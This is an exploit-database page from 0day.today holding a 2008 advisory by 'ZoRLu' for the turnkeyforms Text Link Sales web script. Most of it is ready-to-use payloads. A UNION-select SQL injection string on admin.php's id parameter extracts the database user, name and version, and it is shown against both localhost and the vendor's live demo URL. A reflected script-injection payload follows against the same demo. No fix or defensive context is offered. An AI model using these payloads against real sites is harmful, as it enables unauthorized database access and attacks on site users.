[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4182
Category
web applications
Date add
14-11-2008
Platform
unsorted
=================================================================
turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability
=================================================================


[~] turnkeyforms Text Link Sales Remote Sql inj & xss
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 14.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 43
[~]
[~] my target bug number: 100
[~]
[~] -----------------------------------------------------------


Exploit: sql inj

http://localhost/script/admin.php?a=users&id=[SQL]


[SQL]

999+union+select+1,user(),database(),version(),5,6,7--


sql for demo:

http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--


xss:

http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id="><script>alert()</script>

[~]----------------------------------------------------------------------



#  0day.today [2024-06-25]  #